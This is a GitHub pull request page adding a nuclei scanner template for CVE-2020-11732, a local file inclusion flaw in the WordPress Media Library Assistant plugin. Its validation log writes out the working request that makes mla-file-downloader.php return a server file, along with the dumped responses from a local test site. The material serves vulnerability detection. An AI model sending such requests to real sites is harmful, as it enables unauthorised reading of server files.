Add CVE-2020-11732 (Updated CVEs) #14122
Open
+32
−0
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
ADD CVE-2020-11732
The Media Library Assistant plugin before 2.82 for Wordpress suffers from a Local File Inclusion vulnerability in mla_gallery link=download.
https://wpscan.com/vulnerability/80d60584-fa03-407e-a7bd-32d507a1046d/
Template validation
└─$ nuclei -t 1.yaml -u http://www.mywordpress.local -debug __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.4.10 projectdiscovery.io [WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support. [INF] Current nuclei version: v3.4.10 (outdated) [INF] Current nuclei-templates version: v10.3.4 (latest) [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 0 [INF] Templates loaded for current scan: 1 [WRN] Loading 1 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] [CVE-2020-11732] Dumped HTTP request for http://www.mywordpress.local/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php HTTP/1.1 Host: www.mywordpress.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip [DBG] [CVE-2020-11732] Dumped HTTP response http://www.mywordpress.local/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php HTTP/1.1 200 OK Connection: close Content-Length: 28 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="index.php" Content-Transfer-Encoding: binary Content-Type: text/html;charset=UTF-8 Date: Sat, 29 Nov 2025 19:01:45 GMT Expires: 0 Last-Modified: Sun, 08 Jan 2012 17:01:11 GMT Pragma: public Server: Apache/2.4.56 (Debian) <?php // Silence is golden. [CVE-2020-11732:dsl-1] [http] [high] http://www.mywordpress.local/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php [INF] [CVE-2020-11732] Dumped HTTP request for http://www.mywordpress.local/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php HTTP/1.1 Host: www.mywordpress.local User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip [DBG] [CVE-2020-11732] Dumped HTTP response http://www.mywordpress.local/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php HTTP/1.1 200 OK Connection: close Content-Type: text/html; charset=UTF-8 Date: Sat, 29 Nov 2025 19:01:45 GMT Server: Apache/2.4.56 (Debian) Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Download Error</title></head><body>ERROR: download path out of bounds.</body></html> [INF] Scan completed in 19.32042ms. 1 matches found.Additional References: